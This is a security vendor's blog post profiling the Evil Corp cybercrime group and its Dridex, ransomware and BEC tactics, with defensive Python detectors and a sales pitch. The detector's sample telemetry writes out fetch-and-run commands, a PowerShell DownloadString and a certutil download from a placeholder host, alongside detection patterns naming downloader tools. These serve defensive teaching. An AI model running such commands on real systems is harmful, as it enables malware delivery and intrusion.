
Evil Corp: Anatomy of a Modern Cybercriminal Organization

Inside Russia's Evil Corp operations: malware, ransomware, phishing for profit, with valuable security lessons.
May 27, 2025

Evil Corp, also tracked as UNC2165, GOLD DRAKE, and Indrik Spider, is a Russian cybercriminal group responsible for the Dridex banking trojan and much more. Its leader, Maksim Yakubets, and the group's affiliates are masters of social engineering and email phishing.

CISOs and security teams who understand how the group operates can see why its tools evade traditional defenses. Email is its dominant delivery channel: 35% of attackers distributing malware deliver it almost exclusively through email.

In this blog, we explore Evil Corp's playbook and examine their tactics, evolution, and impact on global cybersecurity.

The History of Evil Corp Operations

Evil Corp has been in operation for over a decade and has evolved into one of the most sophisticated digital criminal enterprises.

Their history and growth demonstrate a methodical approach:

  • Founded in 2007, when Maksim Yakubets (known as 'Aqua') began his digital crime operations.

  • Formed “The Business Club” between 2011 and 2014, targeting UK banking credentials with fellow Russian cybercriminals.

  • Developed and deployed the famous Dridex malware (related to Cridex and the Bugat trojan horse) by 2014.

Using Dridex, Evil Corp stole over $100 million from financial institutions and their customers in more than 40 countries.

Their intrusion methods exposed gaps in common security stacks, and they also point to how those gaps can be closed.

Evil Corp’s Malware and Cyber Attacks

Evil Corp attacks focus on three main threat vectors, executed with precision: phishing, ransomware, and business email compromise (BEC).

Combined with refined methods for bypassing multi-factor authentication, these left traditional security measures falling short.

Phishing Email Campaigns

Evil Corp conducts highly specialized phishing operations that include complex development and distribution:

  • Emails personalized for individuals and specific industries, primarily healthcare.

  • Malicious attachments or malware-linked content that infiltrate the target environment.

  • Spear-phishing emails used to deliver payloads that lead to the installation of malware.

  • SocGholish framework implementation to disguise malware as legitimate browser updates.

  • Use of fileless malware to evade traditional antivirus software detection.

Their signature tool, Dridex banking trojan, specializes in stealing credentials and financial data. Dridex is distributed using massive phishing email campaigns that send millions of messages per day.

Targets receive seemingly legitimate emails. In reality, these are impersonation attacks carrying infected Office documents as attachments. Once the recipient opens the attachment and enables macros, the macro fetches and installs Dridex.

Dridex's keylogger then captures credentials and sends them to an Evil Corp command-and-control server. Recognizing and responding to such attacks is hard because the user rarely notices that anything has happened.
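To make the delivery step concrete, here is an added example written for this article (it is not Evil Corp tooling and not Abnormal's product) that triages an Office attachment before a user can enable anything: it checks the container's magic bytes, looks for a VBA project inside an Office Open XML package, and flags the mismatch of a macro-carrying part behind a macro-free extension. The sample documents it builds are constructed placeholders, not real Word files, and the legacy binary .doc format is only identified, not parsed (that needs an OLE2 parser such as oletools).

```python
"""Static triage of an emailed Office document.

Added example for this article: neither Evil Corp tooling nor any vendor's
product. It flags the delivery pattern described above: a document carrying a
VBA project, which can run a macro once the recipient enables content. Only
Office Open XML containers (.docx/.docm/.xlsm ...) are inspected; legacy binary
.doc/.xls files are OLE2 compound files that need a dedicated parser, so here
they are only flagged by their magic bytes.
"""
from __future__ import annotations

import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls container
ZIP_MAGIC = b"PK\x03\x04"                            # OOXML container
MACRO_CONTENT_TYPES = (
    "application/vnd.ms-office.vbaProject",          # the VBA part itself
    "macroEnabled.main+xml",                         # main part of .docm/.xlsm/.pptm
)
MACRO_EXTENSIONS = (".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm")


def scan_attachment(filename: str, data: bytes) -> list[str]:
    """Return findings for one attachment; an empty list means nothing was seen."""
    findings: list[str] = []
    if data.startswith(OLE2_MAGIC):
        # Macros in the binary formats live in OLE storages; out of scope here.
        findings.append("legacy_ole2_container")
        return findings
    if not data.startswith(ZIP_MAGIC):
        return findings
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            ctypes = (zf.read("[Content_Types].xml").decode("utf-8", "replace")
                      if "[Content_Types].xml" in names else "")
    except zipfile.BadZipFile:
        findings.append("corrupt_container")
        return findings
    if any(n.lower().endswith("vbaproject.bin") for n in names):
        findings.append("vba_project_present")
    if any(ct in ctypes for ct in MACRO_CONTENT_TYPES):
        findings.append("macro_enabled_content_type")
    # A macro-free extension wrapping a VBA project is a mismatch worth surfacing
    # on its own: the name is chosen to look harmless, the content is not.
    if "vba_project_present" in findings and not filename.lower().endswith(MACRO_EXTENSIONS):
        findings.append("macro_in_non_macro_extension")
    return findings


def build_sample(macro: bool) -> bytes:
    """Constructed minimal OOXML container for the example (not a real Word file)."""
    main_ct = ("application/vnd.ms-word.document.macroEnabled.main+xml" if macro else
               "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    overrides = f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
    if macro:
        overrides += ('<Override PartName="/word/vbaProject.bin" '
                      'ContentType="application/vnd.ms-office.vbaProject"/>')
    ctypes = ('<?xml version="1.0" encoding="UTF-8"?>'
              '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
              f"{overrides}</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", ctypes)
        zf.writestr("word/document.xml", "<w:document/>")
        if macro:
            zf.writestr("word/vbaProject.bin", b"\x00constructed placeholder\x00")
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in (("Invoice_2025.docm", build_sample(True)),
                       ("Invoice_2025.docx", build_sample(True)),
                       ("Report.docx", build_sample(False))):
        print(name, scan_attachment(name, blob))
```

The check is deliberately content-based: renaming the file or re-obfuscating the macro body does not remove the `vbaProject.bin` part, which is what Word needs in order to run anything. A gateway policy that quarantines on `vba_project_present` for external senders catches the Dridex delivery pattern without needing a signature for the current loader.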

Ransomware Attacks

Evil Corp’s ransomware operations are multi-phase, modular attacks adapted to each target's defensive environment. Variants such as BitPaymer were built to evade detection.

Evil Corp later adopted Cobalt Strike for lateral movement and SocGholish for initial access, staying ahead of threat researchers and law enforcement.

This flexibility and strategic planning often left organizations with few options beyond paying the ransom. Stealing data before deploying the ransomware was also common, for extra leverage.

Business Email Compromise Tactics

Evil Corp’s BEC operations employ advanced account takeover and financial manipulation techniques:

  • Credential harvesting using Dridex's keylogging capabilities to obtain legitimate access.

  • Interception of email threads (attacker-in-the-middle) to alter invoices and payment details with legitimate-looking modifications.

  • Established money mule networks make fund recovery nearly impossible once transactions are complete.

  • Executive impersonation meant to deceive employees and initiate unauthorized transactions.

Financial departments are often targeted, exploiting trust and legitimate processes to siphon funds without triggering traditional security alerts.

Challenges in Detecting Evil Corp’s Threats

Traditional security measures consistently fail against Evil Corp due to fundamental limitations such as:

  • Signature-Based Detection Failures: Legacy tools that rely on known signatures and rules cannot keep pace with rapid code changes; a recompiled or repacked build of the malware slips past them.

  • Living-Off-The-Land Techniques: Attackers use tools already present on the system (script hosts, administrative utilities), so their activity looks legitimate in security logs and their traffic blends with normal network activity.

  • Critical Infrastructure Targeting: Healthcare, infrastructure, and government systems combine complex security requirements with severe consequences for downtime, which makes them attractive targets and raises the pressure to pay.

  • Jurisdictional Protection Barriers: Russia's reluctance to extradite cybercriminals creates a haven for Evil Corp operations, protected by geographical and political boundaries.

  • Sanction Evasion Capabilities: After the December 2019 US Treasury sanctions, the group changed its tooling and branding to avoid scrutiny, demonstrating that conventional punishment mechanisms force adaptation, not cessation of activities.
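The first two limitations above are why detection has to key on behavior rather than on what a file looks like. The following is an added example written for this article (not Evil Corp tooling and not any vendor's product): a small rule set that walks process-creation telemetry and flags Office applications spawning script hosts, stager-like command lines, and LOLBin downloads. The events are constructed JSON lines whose field names are this example's own, loosely modelled on Sysmon Event ID 1; the hostnames, PIDs and `example.invalid` URLs are placeholders. A repacked loader changes its hash, but not the fact that Word has to start cmd.exe or PowerShell to run it.

```python
"""Behaviour-based detection of the document-to-loader chain.

Added example for this article, not Evil Corp tooling or any vendor's product.
Instead of matching a file hash, it scores process-creation events (constructed
JSON lines, field names chosen for this example) on parent/child relationships
and command-line content, which survive repacking of the payload.
"""
from __future__ import annotations

import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
LOLBIN_DOWNLOADERS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe"}
# Command-line fragments that usually mean "fetch or decode a next stage":
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|downloadstring|invoke-webrequest|\bhttps?://|"
    r"certutil.*-urlcache|-decode|frombase64string)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Score one process-creation event; returns (score, reasons)."""
    parent, child = _basename(ev.get("parent_image", "")), _basename(ev.get("image", ""))
    cmd = ev.get("command_line", "")
    score, reasons = 0, []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:       # the macro just ran something
        score += 60
        reasons.append(f"office_spawns_{child}")
    if child in SCRIPT_HOSTS and SUSPICIOUS_ARGS.search(cmd):  # looks like a stager
        score += 30
        reasons.append("stager_like_command_line")
    if child in LOLBIN_DOWNLOADERS and re.search(r"https?://", cmd, re.I):
        score += 40                                            # signed binary used as downloader
        reasons.append("lolbin_fetches_url")
    if child in {"powershell.exe", "pwsh.exe"} and HIDDEN_WINDOW.search(cmd):
        score += 10
        reasons.append("hidden_window")
    return score, reasons


def detect(lines, threshold: int = 60) -> list[dict]:
    """Run the rules over JSON-lines telemetry and return events scoring >= threshold."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev.get("host"), "pid": ev.get("pid"),
                           "score": score, "reasons": reasons})
    return alerts


SAMPLE_TELEMETRY = [json.dumps(e) for e in (   # constructed events, not real campaign artefacts
    {"host": "ws01", "pid": 4120, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -w hidden -enc SQBFAFgA"},
    {"host": "ws01", "pid": 4127, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},          # benign admin script
    {"host": "ws02", "pid": 4133, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/u')\""},
    {"host": "ws02", "pid": 4140, "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/a.dat a.dat"},
    {"host": "ws03", "pid": 4150, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "WINWORD.EXE /n"},                                         # Word itself starting
)]

if __name__ == "__main__":
    for alert in detect(SAMPLE_TELEMETRY):
        print(alert)
```

The scores are additive so that a single weak signal (an admin's PowerShell script) stays below the alert line while the combination an attack needs (Office parent plus an encoded or URL-bearing command line) crosses it. The threshold and weights are this example's own; in production they would be tuned against the environment's own baseline of Office-spawned processes.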

Emerging AI Attack Methods

While there's no public confirmation that Evil Corp specifically uses AI cyberattacks yet, the trend among sophisticated cybercriminals includes developing:

  • More convincing AI-generated phishing content.

  • Faster vulnerability identification and exploitation.

  • Evasion techniques that learn from defensive measures.

Such capabilities represent a significant challenge for CISOs and security teams, unless combated with equally powerful behavioral AI solutions.

The Importance of Proactive Cybersecurity Measures

Fighting sophisticated threats like Evil Corp requires a fundamental shift from reactive to proactive security approaches that anticipate attack patterns. Key elements include:

Preemptive Threat Hunting Capabilities

Active threat hunting is critical for the early detection of complex attacks. Rather than waiting for alarms to sound, organizations must systematically search their networks for signs of data leaks or compromise.

Attackers commonly hide in a network for months before striking; systematic hunting significantly reduces that dwell time.

Strategic Threat Intelligence Integration

Understanding attacker methodologies lets you align defenses before an attack occurs. When your security team knows how threat actors like Evil Corp operate and evolve, you can close the gaps they rely on before they strike.

Behavioral Baseline Monitoring Systems

Understanding normal network behavior patterns enables rapid anomaly identification. Your security stack needs to establish what "normal" looks like for users, systems, and networks to quickly spot what doesn't belong.

AI behavioral analysis excels here, learning patterns, adapting to new threats, and providing critical context for security alerts.

Advanced AI Security Solutions

AI security tools provide adaptive defense capabilities that match evolving threats, with critical advantages:

  • Real-time threat detection as attacks unfold, not hours or days later.

  • Reduced false positives through pattern recognition.

  • Scalable protection across complex network environments.

  • Automated response capabilities that close detection-action gaps.

Organizations that enhance their security with AI stay ahead of such threats. Payloadless attacks are also on the rise: the attacker emails a fake payment receipt with no attachment or link and asks the recipient to call a phone number to dispute the charge.

Because there is no payload (no executable and no malicious link) to scan, such attacks often pass straight through traditional secure email gateways (SEGs).
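What a gateway would have to look at instead, as an added example written for this article (not Abnormal's detector): message-level heuristics for a callback lure, run over three constructed messages that are built and parsed with Python's standard email library so the same function can be pointed at real .eml files. The weights, thresholds, sender names and phone numbers are this example's own.

```python
"""Heuristics for a payloadless 'call this number' lure.

Added example for this article, not Abnormal's detector. A secure email gateway
scans attachments and links; a callback lure has neither, so the signal has to
come from the message itself: payment language, urgency, a phone number as the
only call to action, and a billing-department display name on a free-mail
account. The sample messages are constructed here.
"""
from __future__ import annotations

import re
from email import message_from_string
from email.message import EmailMessage
from email.policy import default
from email.utils import parseaddr

PHONE_RE = re.compile(r"(\+?1[ .-]?)?\(?\d{3}\)?[ .-]?\d{3}[ .-]?\d{4}")
URL_RE = re.compile(r"https?://|www\.", re.I)
PAYMENT_RE = re.compile(r"\b(invoice|receipt|subscription|charged|renew(al|ed)?|payment)\b|\$\s?\d", re.I)
URGENCY_RE = re.compile(r"\b(within 24 hours|immediately|cancel|refund|dispute|call (us|now))\b", re.I)
FREEMAIL = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
WEIGHTS = {"phone_number_in_body": 20, "payment_language": 20, "urgency_language": 15,
           "payloadless_callback_pattern": 30, "display_name_on_freemail": 15}


def classify_callback_lure(raw: str) -> dict:
    """Score one RFC 5322 message; verdict 'callback_lure' at 60 or above."""
    msg = message_from_string(raw, policy=default)
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body else ""
    name, addr = parseaddr(str(msg.get("From", "")))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    has_payload = any(True for _ in msg.iter_attachments()) or bool(URL_RE.search(text))
    signals = []
    has_phone = PHONE_RE.search(text) is not None
    if has_phone:
        signals.append("phone_number_in_body")
    if PAYMENT_RE.search(text):
        signals.append("payment_language")
    if URGENCY_RE.search(text):
        signals.append("urgency_language")
    if has_phone and not has_payload:      # the phone number is the whole "payload"
        signals.append("payloadless_callback_pattern")
    if name and domain in FREEMAIL:        # "Billing Dept" writing from a consumer mailbox
        signals.append("display_name_on_freemail")
    score = sum(WEIGHTS[s] for s in signals)
    return {"score": score, "signals": signals,
            "verdict": "callback_lure" if score >= 60 else "clean"}


def _mail(sender: str, subject: str, text: str, attachment: str | None = None) -> str:
    """Build a constructed sample message and serialise it as it would arrive."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = sender, "ap@corp.example", subject
    m.set_content(text)
    if attachment:
        m.add_attachment(b"%PDF-1.4 constructed", maintype="application",
                         subtype="pdf", filename=attachment)
    return m.as_string()


SAMPLE_LURE = _mail(
    "Acme Billing Dept <acme.billing.desk@gmail.com>", "Your subscription renewal receipt",
    "Your annual subscription has been renewed and your card was charged $399.99.\n"
    "Invoice #A-77213. If you did not authorize this, call us immediately at\n"
    "(888) 555-0142 within 24 hours to cancel and request a refund.\n")
SAMPLE_VENDOR = _mail(
    "Accounts Receivable <ar@vendor.example>", "Invoice 1043 - April services",
    "Please find attached invoice 1043 for April services. Pay via our portal at\n"
    "https://portal.vendor.example or reach the AR desk on +1 415 555 0100.\n",
    attachment="invoice-1043.pdf")
SAMPLE_CHAT = _mail("Dana <dana@corp.example>", "Friday",
                    "Still on for lunch Friday? Let me know if the time moved.\n")
```

The vendor invoice scores on phone number and payment language alone, which is why those two signals are weighted so that a message with a real attachment and portal link stays under the threshold; the lure crosses it only because the phone number is the sole call to action and the sender's display name does not fit its mailbox.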

Adaptive Security Architecture Development

Security must evolve to remain effective. CISOs must implement systems that learn and adapt, update protocols regularly, and provide ongoing threat training.

Integrating AI security agents helps keep pace with evolving attack techniques.

Multi-Sector Collaboration Networks

Collective defense efforts multiply intelligence and response capabilities, but require:

  • Public-private partnerships delivering better threat intelligence.

  • Stronger international frameworks for prosecution.

  • Cross-border collaboration between security firms and law enforcement.

How Behavioral AI Can Prevent Evil Corp Threats

AI threat detection enables organizations to stay ahead of intelligent adversaries. Behavioral AI is effective against both known and emerging attack patterns of the kind groups like Evil Corp favor.

Credential Theft and Account Takeover Prevention

Behavioral AI spots unusual account activities even when valid credentials are used. It identifies suspicious actions like bulk data downloads, unusual access times, or abnormal transaction patterns.

For organizations focused on preventing account takeover, behavioral AI provides critical detection capabilities.

If Evil Corp uses stolen executive credentials for wire transfers, behavioral AI recognizes that the timing, amounts, and destinations don't match the executive's normal patterns, triggering automated protective measures.

Multi-Factor Behavioral Authentication Enforcement

AI systems create dynamic identity verification beyond static credentials. Rather than relying solely on passwords or tokens, behavioral AI continually authenticates users based on their interactions with systems: keystroke dynamics, navigation patterns, and typical workflows.

This approach makes stolen credentials far less useful to Evil Corp: the system recognizes subtle differences between the legitimate user and an attacker trying to mimic them, and can challenge or cut off the session.

Automated Threat Containment Response

Behavioral AI takes immediate protective action when threats appear, without waiting for human intervention:

  • Isolates suspicious users from sensitive systems.

  • Terminates compromised sessions.

  • Requires additional authentication factors.

  • Alerts security teams with contextual information.

Continuous Learning and Adaptation Capabilities

Behavioral AI improves defense effectiveness over time through ongoing pattern analysis. The system constantly refines its understanding of normal behaviors, reducing false alarms while improving threat detection accuracy.

As Evil Corp modifies their tactics, including the use of new tools like phishing kits, the AI adapts in parallel, learning from each attempt and strengthening defenses against similar future attacks without requiring manual updates.

Contextual Alert Prioritization

Behavioral AI reduces alert fatigue by differentiating between critical and minor anomalies. The system evaluates suspicious activities within their full context, considering factors like:

  • User role and normal privileges.

  • Sensitivity of accessed resources.

  • Historical behavior patterns.

  • Temporal relationships between activities.
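The wire-transfer scenario in the credential-theft section above and the four contextual factors listed here, as one added example written for this article (not Abnormal's model): a per-user baseline of hours, amounts and beneficiaries, an anomaly check against it, and a scoring step that weights each anomaly by approver role, transfer value and how many anomalies the same user produced in the preceding hour. All users, transfers and account identifiers are constructed, and the weights and thresholds are this example's own.

```python
"""Per-user behavioural baseline and contextual alert scoring for outbound payments.

Added example for this article, not Abnormal's model. It learns what is normal for
each user from past wire transfers (hour of day, amount distribution, known payees),
scores a new transfer against that baseline, then weights each anomaly by context:
approver privilege, value at stake, and anomalies by the same user in the last hour.
All transfers below are constructed.
"""
from __future__ import annotations
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from statistics import mean, pstdev

@dataclass
class Transfer:
    user: str
    ts: datetime
    amount: float
    beneficiary: str       # payee account identifier
    approver_role: str     # e.g. "cfo", "ap_clerk"

@dataclass
class Baseline:
    hours: set[int] = field(default_factory=set)
    amounts: list[float] = field(default_factory=list)
    beneficiaries: set[str] = field(default_factory=set)

def build_baseline(history: list[Transfer]) -> dict[str, Baseline]:
    """Summarise each user's past transfers: the 'normal' everything is compared to."""
    base: dict[str, Baseline] = {}
    for t in history:
        b = base.setdefault(t.user, Baseline())
        b.hours.add(t.ts.hour)
        b.amounts.append(t.amount)
        b.beneficiaries.add(t.beneficiary)
    return base

def anomaly_reasons(t: Transfer, b: Baseline) -> list[str]:
    """Which of timing, amount and destination deviate from the user's baseline."""
    reasons = []
    if not any(abs(t.ts.hour - h) <= 1 for h in b.hours):   # empty baseline counts as unusual
        reasons.append("unusual_hour")
    if len(b.amounts) >= 5:
        mu, sd = mean(b.amounts), pstdev(b.amounts)
        if t.amount > mu + 3 * max(sd, 1.0):
            reasons.append("amount_outlier")
    elif b.amounts and t.amount > 5 * max(b.amounts):         # too little history for a z-score
        reasons.append("amount_outlier")
    if t.beneficiary not in b.beneficiaries:
        reasons.append("new_beneficiary")
    return reasons

ROLE_WEIGHT = {"cfo": 2.0, "controller": 1.6, "ap_clerk": 1.0}   # privilege of the actor
HIGH_VALUE = 50_000                                               # sensitivity of the resource

def prioritize(t: Transfer, reasons: list[str], prior_anomalies_last_hour: int) -> dict:
    """Turn raw anomalies into a contextual risk score from 0 to 100."""
    score = 25.0 * len(reasons) * ROLE_WEIGHT.get(t.approver_role, 1.0)
    if t.amount >= HIGH_VALUE:
        score *= 1.5
    score += 20 * min(prior_anomalies_last_hour, 2)               # temporal clustering
    score = min(round(score), 100)
    severity = "critical" if score >= 70 else "medium" if score >= 40 else "low"
    return {"user": t.user, "amount": t.amount, "score": score,
            "severity": severity, "reasons": reasons}

def triage(history: list[Transfer], incoming: list[Transfer]) -> list[dict]:
    """Score incoming transfers against the baseline; highest risk first."""
    base = build_baseline(history)
    recent: dict[str, list[datetime]] = {}
    findings = []
    for t in sorted(incoming, key=lambda x: x.ts):
        reasons = anomaly_reasons(t, base.get(t.user, Baseline()))
        if not reasons:
            continue
        window = [ts for ts in recent.get(t.user, []) if t.ts - ts <= timedelta(hours=1)]
        findings.append(prioritize(t, reasons, len(window)))
        recent.setdefault(t.user, []).append(t.ts)
    return sorted(findings, key=lambda f: f["score"], reverse=True)

# Constructed history: the CFO pays three known suppliers in office hours and an
# AP clerk pays two others. Nothing here is real transaction data.
HISTORY = (
    [Transfer("cfo.jane", datetime(2025, 5, i + 1, h), a, ["ACC-A", "ACC-B", "ACC-C"][i % 3], "cfo")
     for i, (h, a) in enumerate(zip([9, 10, 11, 14, 15, 16, 17, 13, 12, 10],
                                    [8000, 12000, 15000, 9500, 11000, 14000, 10000, 13000, 12500, 9000]))]
    + [Transfer("ap.bob", datetime(2025, 5, i + 1, h), a, ["ACC-D", "ACC-E"][i % 2], "ap_clerk")
       for i, (h, a) in enumerate(zip([10, 11, 14, 15, 16, 9], [1200, 1800, 2500, 900, 2100, 1500]))]
)
INCOMING = [
    Transfer("cfo.jane", datetime(2025, 5, 20, 3, 14), 180000, "ACC-X99", "cfo"),  # 03:14, new payee, ~15x usual
    Transfer("cfo.jane", datetime(2025, 5, 20, 3, 40), 95000, "ACC-X99", "cfo"),   # second one within the hour
    Transfer("ap.bob", datetime(2025, 5, 20, 14, 5), 2400, "ACC-D", "ap_clerk"),   # routine
    Transfer("ap.bob", datetime(2025, 5, 20, 14, 30), 2900, "ACC-F", "ap_clerk"),  # new payee, normal amount/time
]
```

Run `triage(HISTORY, INCOMING)` and the two 3 a.m. CFO transfers come out critical on every axis (hour, amount, destination, executive role, value, and the second one clustering with the first), while the clerk's new payee is logged as low: same kind of anomaly, but a low-privilege actor, a routine amount and no prior anomalies. That ordering is the point of contextual prioritization: the queue is sorted by what the anomaly would cost, not by how many anomalies fired.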

See Abnormal’s Behavioral AI in Action

Behavioral AI is one of the most effective defenses against the advanced threats that groups such as Evil Corp use. Spotting unusual behavior, even when valid credentials are in play, provides critical protection where other tools fail.

Abnormal is on a mission to protect people with behavioral AI. We’re using advanced AI to protect what matters most: the human targets.

According to Abnormal’s research, “Within the next few years, malware will have advanced techniques built in that will allow it to recognize the system it is in and morph itself to defend against, or even avoid, current detection systems.”

If you’re ready to secure your organization from threats that bypass traditional security, schedule a demo to see how Abnormal identifies and stops attacks others miss.
